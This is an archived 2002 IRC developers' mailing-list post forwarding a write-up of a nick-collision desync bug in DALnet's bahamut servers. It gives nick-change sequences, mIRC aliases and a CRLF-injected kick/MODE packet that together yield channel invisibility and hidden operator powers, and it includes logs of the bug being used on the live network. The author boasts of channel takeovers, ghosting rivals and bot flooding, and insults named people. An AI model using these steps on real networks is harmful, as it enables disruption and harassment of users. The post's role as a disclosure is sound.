[IRC-DEV] (fwd) weird bahamut (and possibly others) sync bug

RoMaNSoFt roman at madrid.com
Fri Feb 15 20:12:48 CET 2002


 Pues nada, a ver si vosotros, q sois los "entendíos" de esto del irc,
me comentais lo siguiente. ¿Funcionaría en irc-hispano? ¿Alguno lo ha
probado en alguna red? =)

 Salu2,
 --Roman


On Fri, 15 Feb 2002 02:58:42 +0000, ET <bofh at phreaker.net> wrote:

=================== WEIRD DALNET SYNC BUG =========================
(my first post! don't bug me if i didn't get it picture perfect)
Author:  Enstyne
Contact: irc.cyberarmy.com #cyberarmy

Dates:   June 8 2001 -- original document
             Feb  9 2002 -- revised for distribution

-----------------------------------------------------
VENDOR STATUS:
I notified the dalnet bahamut crew almost 2 years ago
i was slightly sketchy on info, but as clear as i explained
It they thought i was "just describing lag".
A friend of mine 'llthangel' was there at the time, part
of the unrealircd team. He was also turned away as if it
this was useless info.

Two years is enough time to test/acknowledge a problem, in my opinion.
-----------------------------------------------------

PLEASE NOTE: this exploit has lots of variables, i have
reproduced the effect more than 100 times at many different
occasions, including a few days before this document.
Also note that this is very hard for me to explain in words.
and to get across the idea in my head. Don't ask...
It works and many people are witnesses to it being used
several times.
-----------------------------------------------------

REPRECUSSIONS:
I have reproduced the following effects using this bug:
Invisibility on channels
Invisible Operator Status (kick people while deoped, etc)
Invulnerability to CHANSERV MKICK and CHANSERV DEOP
Complete aquisition of /WHOIS info from the remote party involved
   ^^^ That means you can kind of hide your host.
-----------------------------------------------------

OVERVIEW:
Asessment: This is (i think) a bug in the TS3 protocol.

Requirements: more Lag in one direction than the other
               on two seperate servers. (Don't ask, it happens)

Comments:
This probably works on lots of networks other than dalnet
but dalnet is the one i've tested it on, it seems like a
"race condition" exploit due to the requirement of lag,
it used to give you a few minutes until you see some
movement on the other side it was so bad....
-----------------------------------------------------


DESCRIPTION:
I'll take for this example, two clients and a US and an EU server
that have been connected a long way away from each other, As the lag
is
greater over greater distances between servers (generally).

Now, you both join them to a channel...
say,
#ch0wn

then in the channel you have both nicks like
Ens1 and Ens2

Ens1 on US.dal.net
Ens2 on EU.dal.net

------------------------------------
Please note that the messages going from the EU->US server go
faster than the messages going US->EU.
This is a strange(beats me) but vital part of the exploit.
---------------------------

Part 1):
UK Screen:

**** Now talking in #ch0wn
	(/nick Enspine | nick halfghost )
*** Ens1 is now known as Enspine
*** Enspine is know known as halfghost
*** Ens2 is know known as Enspine

Part 2):
US Screen:

**** Now talking in #ch0wn
(/nick Enspine)
*** Ens2 is now known as Enspine
(a couple of seconds/minutes later)
*** Ens1 has quit IRC (Killed (EU.dal.net -> (Enspine) US.dal.net)


----------------------------

But, since the person being killed is Enspine on the US side. Which is
does not exist on that side, but on the EU side, the kill path is
flawed!
and is therefore rejected on all but the EU server.

The result of all this becomes that the nick "halfghost" on the
US server, does not exist on all parts of the network.

any command that goes through the servers this nick does not exist
on will result in a kill message such as:
*** halfghost has quit IRC (Killed (EU.dal.net -> (halfghost(?))
US.dal.net))

to test this you could use something like:
./whois chanserv == won't kill
./whois EU.dal.net chanserv == will kill

-----------------------------

Now we can build us up a cool packet
like /kick #ch0wn Chawmp . $+ $crlf $+ MODE #ch0wn +inm
this will only happen around locally as all the other servers
will reject the message. Chawmp will not auto-rejoin.
And "halfghost" will get killed by the server.

chawmp is on the EU server by the way.

Every time he speaks he'd get a message
from the desync'd server saying that he's not on channel.
if he rejoins, and doesn't get opped.. then he will also get messages
about the moderated channel, but yet he will see +m is not set!

The funny thing about desyncs is that when you desync something
it can sometimes start to spread more than what you started

say chawmp is opped on #ch0wn but has been "locally kicked" by
halfghost
then a guy named "lamer" joins on any server.
If chawmp ops him, he won't be opped on the US server!

therefore now the EU server has it's share of desync's too
especially if "lamer" starts setting channel modes

Also, you may be able to empty a channel of people with the halfghost
and they would never know, then you can join a client onto the US
server and get opped by the server, and not deopped by chanserv
(if your lucky) and would look, on the EU server like your not opped
at all.

-----------------------------
The only aliases i used for the test were: (on mIRC)
/col /nick Enspine
/cob /nick Enspine | /nick Enx435

^^^ lol, if you are using those to test this out i wish you good luck.
-----------------------------





LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(from one client's view)
[23:34] <wa1800z> it's a hole bigger then their irc addicted asses but
they 
dun wanna admit it
[23:34] <Chawmp> Enstyne, do the sploit again! :)
[23:34] <wa1800z> lol
[23:34] <Enstyne> okay, but if i get klined
[23:34] <Chawmp> want whoot :)
[23:34] <Enstyne> it's Chawmp's fault
[23:35] <Enstyne> lol
[23:35] <Chawmp> Enstyne :)
[23:35] <wa1800z> noted
[23:35] <wa1800z> ;)
[23:35] <Chawmp> i'd give you a shell....
[23:35] <Chawmp> but i only g0t 56k :_)
[23:35] <Enstyne> lol
[23:35] <Enstyne> i know
[23:35] <Enstyne> i already have a root shell Chawmp
[23:35] <Enstyne> lol... j/k
[23:36] <Chawmp> lol :)
[23:36] *** Enstyne is now known as Ens|US
[23:36] <Chawmp> heheh
[23:36] *** Ens|US is now known as Enspine
[23:36] *** Enspine is now known as Enstyn
[23:36] <Enstyn> hmmmmmm
[23:36] <Enstyn> seems to have worked
[23:36] <Enstyn> :)
[23:36] <Enstyn> let's check
[23:36] <Chawmp> ooo... that quick?!?!
[23:37] <Enstyn> brb
[23:37] *** Disconnected
Session Close: Tue Oct 31 23:37:18 2000




LOGS OF EXPLOIT BEING EXECUTED:
-------------------------------
(SEPERATE INCIDENT, THIS ONE MAY BE EASIER TO UNDERSTAND)
(server A)
[20:57] *** Enstyne is now known as Enspine
[20:57] *** Enspine is now known as Enstyn

(server B)
[20:57] *** Ens|UKKKkkk is now known as Enspine
(the other chnick to Enspine got through then and killed me)
[20:57] *** Disconnected

(server A)
[20:57] *** Ens|UKKKkkk is now known as Enspine
[20:57] <Enstyn> hmmmmm
[20:57] <Enstyn> how many do you see?
[20:57] <Chawmp> 2 ppl...
[20:57] <Chawmp|UK> 1 person
[20:57] <Chawmp> 2
[20:57] <Chawmp|UK> 1
[20:57] <Enstyn> lol
[20:57] <Enstyn> okay
[20:57] <Enstyn> that worked
[20:58] <Chawmp|UK> !!!
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message
for 
jullia^!~banasor at 212.253.45.101. From adm Path: 
philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> yAY
[20:58] * Enstyn thinks
[20:58] <Enstyn> what do i do next
[20:58] <Enstyn> hmmmmmm
[20:58] <Chawmp|UK> :)
[20:58] <Enstyn> Chawmp: what's the "invisi" persons nick
[20:58] <Enstyn> since i'm "Enstyn"
[20:58] <Chawmp|UK> well
[20:58] <Enstyn> what's the other?
[20:58] <Chawmp|UK> must be enspine then
[20:58] <Enstyn> yep
[20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message
for 
angelia``!~banasor at 212.253.45.101. From adm Path: 
philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
[20:58] <Chawmp|UK> enspine: No such nick/channel
[20:58] <Enstyn> okay.. join #cyberarmy with chawmp|UK
[20:58] <Chawmp> Enspine (admin at 194.165.169.25) [Unknown]
[20:58] <Chawmp> :)
[20:59] <Chawmp|UK> ok...
[20:59] <Enstyn> then change nick to Enspine
[20:59] <Chawmp|UK> done
[20:59] <Enstyn> exactly
[20:59] *** Chawmp|UK has quit IRC (Killed (netropolis-r.uk.eu.dal.net
(lineone.uk.eu.dal.net(Enspine) <-
lineone.uk.eu.dal.net[unknown at localhost])))
[20:59] <Enstyn> your invis!
[20:59] <Enspine> done
[20:59] <Chawmp> !!!!
[20:59] <Chawmp> !!!!!
[20:59] <Chawmp> r00t!
[20:59] <Enstyn> LOl
[20:59] <Enstyn> you are!~!@!
[21:00] <Chawmp> argh
[21:00] <Chawmp> i cant operize
[21:00] <Enstyn> Chawmp: i'll go op you

      ^^^^ note that in the above he had become invisible to services
           well, in a way, because they also thought he wasn't on the
           channel he was requesting ops on.
           It looked like Chawmp|UK had died but i was just on a
server
           which got the invisibility effect. "Chawmp|UK" turned
           into Enspine afterwards... and kind of brought it back to
           life :)



-------------------------------
FINAL NOTES:
I hope at least one person on this mailing list can understand this.
I have also exploited this bug before by using nickserv ghost. (figure
it 
out, same concept)
ghost the nick on US server, then at the same time, change the nick
getting 
ghosted by
nickserv to a different nick... if it says 'nick whatever was ghosted'
and 
the client didn't get
disconnected, then it works..... think of the possibilities :)


---------------------------------------------------------------------------------------
SHOUTS:
Anyone intrested in the matrix && irc... should really take a look at
this:
http://cashells.massiveisp.net/~ens/matrixstory.txt

Shouts tew the ch0wn krew! on irc.cyberarmy.com
the people of the ch0wn krew went through extensive confusion as
i developed this exploit, actually even i was pretty confused.
Chawmp  - in this case, you wern't confused you were just loving it.
lol. 
¿g0t? is chawmp's trademark.
keoki   - for kicking the people i wouldn't dare while invisible under
the 
effect. lol
wa1800z - you seem way too busy nowadays for *
shad    - for telling me to "write it up" instead of trying to explain
it 
every time. kraft addict
think12 - you seem to have a remarkable tolerance for the weird c**p i
do, 
unbottle though!
gM      - haha, i always forgot to include you before, so you're in
now! 
(gM knows his irc stuff)
nsh     - college life catchin' up on ya? brilliant mind this guy has.
The_Itch- he views the world through cee-debug glasses, irc wizard!
(and 
has lots of 0days too, so annoy him)
(AND OTHERS TOO) :)

xtra shouts to the #cyberarmy, irc.cyberarmy.com crew
Cass (Weapon of choice, Loki of the attackbots)
Di]v[pLes (taken so much stick and given so much)
matt999 (the Matt that isn't vulnerable to +++ATH0)
darkroot (who sooooo wanted me to give him this info to him first
hehe)
blexim (tonnes of testing and messing about. lol)
hellz (we used holodeck irc sim program to msg this guy w/ 12,000
bots)
Quantum_Knight (man, you relieve me of my sanity)
Kaladis (for observing experiments in #cyberarmy with laughter)
(+ OTHERS I FORGOT) it's 2am today and i'm exhausted, bleh :)

w1z - lmao man, that was so funny when we made you receive the wrong
whois 
info and
       turned you invisible so BaDaSSS couldn't do anything. Hahaha.

Chawmp, keoki and I took over DALnet #kkk for a couple of hours with
this 
(hush hush).
This exploit is dedicated to Douglas Adams, the Shakespeare of our
modern 
world.


---------------------------------------------------------------------------------------
ANTI-SHOUTS:
BaDaSSS - you are one of the sillyest people i've ever met, you will
never 
get anywhere unless
           you accept things and seek proffesional help.
           you cried to me after losing your aop in #cyberarmy and
then 
nagged llthangel about
           it for years afterwards... pssht...
           and i thought you "didn't give a *" ... you've had it
coming for 
a long long time.

           p.s. haha, I owned your services and ghosted your ass from
your 
own network.

Ron885 - Same story except you didn't strike it lucky and get aop in
#cyberarmy
          You took all the wrong turns man and ended up in lamerville.
Also 
got ghosted.

script0r - you were okay, but then you turned into an almost
hitler-like 
domineer.
            You still are good natured at heart though. -Ghosted-
(only 
because you started setpassing)

Wacko/MaxD/MaxDemian/whatever - Wacko(ff) you are so unbelievably
blind a 
bat would pity you.
            "you don't winsock to make a http request, you use INet
you 
..." (erm, yeah, ok)
            like it matters. Most of the people you think like you
wacko 
don't. Believe me
            because they've told me. This guy had to beg for
crazyhorse to 
stop conconing his
            oh-so-elite vb webserver he'd coded up. I wonder if he
used 
Inet for that aswell :)

---------------------------------------------------------------------------------------




More information about the IRC-Dev mailing list